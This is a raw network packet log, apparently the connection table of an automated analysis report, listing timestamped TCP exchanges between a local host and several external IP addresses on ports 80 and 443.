Sep 27, 2024 00:15:06.658188105 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658202887 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658216953 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658231020 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658231974 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658257008 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658281088 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658390999 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658406019 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658420086 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658433914 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658437967 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658447981 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658463001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658477068 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658477068 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658519983 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658535004 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658740997 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658788919 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658798933 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658813953 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658843040 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658862114 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658889055 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658902884 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658917904 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658931971 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658935070 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.658948898 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.658960104 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.659003973 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663297892 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663347960 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663367033 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663382053 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663413048 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663446903 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663449049 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663500071 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663506985 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663548946 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663563013 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663597107 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663628101 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663629055 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663654089 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663661957 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663669109 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663707018 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663711071 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663750887 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663762093 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663785934 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663795948 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663820982 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663831949 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663856030 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663872957 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663888931 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663906097 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663921118 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663930893 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663954973 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.663971901 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.663990021 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.664002895 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.664036036 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.665699959 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.665733099 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.665779114 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.665797949 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.665805101 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.665838003 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.665860891 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.665870905 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.665890932 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.665903091 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.665935993 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.665940046 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.665951014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.665970087 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.665985107 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666019917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666019917 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666053057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666069031 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666085005 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666109085 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666119099 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666135073 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666151047 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666162968 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666186094 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666201115 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666222095 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666235924 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666268110 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666271925 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666305065 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666332960 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666338921 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666352034 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666371107 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666387081 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666404009 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666421890 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666435957 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666448116 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666469097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666484118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666501045 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666521072 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666533947 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666551113 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666565895 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666584015 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666599989 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666621923 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666630983 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666646957 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666662931 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666676044 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666697025 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666728973 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666763067 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666780949 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666780949 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666780949 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666790962 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.666811943 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.666840076 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746197939 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746212959 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746227026 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746344090 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746350050 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746365070 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746378899 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746393919 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746401072 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746417046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746431112 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746438980 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746447086 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746462107 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746470928 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746484995 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746500015 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746521950 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746551037 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746553898 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746566057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746579885 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746609926 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746630907 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746645927 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746645927 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746685982 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746714115 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746728897 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746750116 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746762991 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746776104 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746777058 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746790886 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746802092 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746825933 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746862888 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746879101 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746893883 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746908903 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746923923 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746931076 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746939898 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.746959925 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.746999025 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747026920 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747044086 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747073889 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747109890 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747121096 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747134924 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747148991 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747162104 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747165918 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747190952 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747216940 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747277975 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747293949 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747308969 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747327089 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747356892 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747356892 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747370958 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747395039 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747409105 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747409105 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747436047 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747466087 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747492075 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747507095 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747520924 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747534990 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747539043 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747551918 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747564077 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747580051 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747621059 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747761011 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747776985 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747792006 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747813940 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747831106 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747843027 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747848034 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747859001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747873068 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747889042 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.747894049 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747912884 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.747947931 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748234034 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748249054 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748262882 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748276949 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748287916 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748300076 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748308897 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748312950 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748327971 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748342037 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748342037 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748357058 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748367071 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748374939 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748389959 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748402119 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748405933 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748421907 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748435974 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748442888 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748450994 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748467922 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748486042 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748497963 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748513937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748517990 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748531103 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748544931 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748548031 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748559952 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748568058 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748574972 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748594999 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748629093 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748928070 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748943090 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748956919 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748971939 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.748979092 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.748992920 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.749001980 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.749007940 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.749022961 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.749036074 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.749043941 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.749053001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.749067068 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.749070883 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.749082088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.749095917 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:06.749102116 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.749124050 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.749142885 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:06.886898994 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:06.886960983 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:06.887028933 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:06.887334108 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:06.887356043 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:07.190037012 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:07.190090895 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:07.190171957 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:07.191673994 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:07.191694021 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:07.668929100 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:07.669122934 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:07.670861959 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:07.670872927 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:07.671272039 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:07.711447954 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:07.715045929 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:07.715184927 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:07.715267897 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:07.750700951 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:07.750778913 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:07.751282930 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:07.751291990 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:07.752876043 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:07.752882004 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:08.133117914 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:08.133244038 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:08.133341074 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:08.134969950 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:08.134969950 CEST	49766	443	192.168.2.4	104.21.36.139
Sep 27, 2024 00:15:08.134996891 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:08.135010958 CEST	443	49766	104.21.36.139	192.168.2.4
Sep 27, 2024 00:15:08.178118944 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:08.178174973 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:08.178267956 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:08.178670883 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:08.178688049 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:08.654504061 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:08.654623032 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:08.656332970 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:08.656351089 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:08.656616926 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:08.657882929 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:08.657917023 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:08.657960892 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:08.710968018 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:08.711049080 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:08.711066008 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:08.711105108 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:08.711322069 CEST	49765	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:08.711337090 CEST	443	49765	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:08.712829113 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.717771053 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898118019 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898183107 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898192883 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898205996 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898248911 CEST	49764	80	192.168.2.4	147.45.44.104
